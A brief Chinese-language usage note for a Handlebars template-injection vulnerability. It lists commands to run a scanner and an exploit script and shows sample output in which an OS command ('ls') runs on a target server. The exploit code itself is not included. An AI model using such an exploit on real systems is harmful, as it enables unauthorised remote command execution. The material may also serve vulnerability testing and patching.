Handlebars 在输出中使用的特殊元素的中和不当(注入)漏洞
pip install requests packaging
python handlebars_scanner.py
pip install requests
python handlebars_exploit.py
输入目标URL:
利用预期输出 : 输入目标URL(例如 http://example.com/render): http://example.com/render
输入要执行的OS命令: ls
[+] 正在向 http://example.com/render 发送利用载荷...
[+] 载荷执行成功。
[+] 响应:
file1.txt file2.txt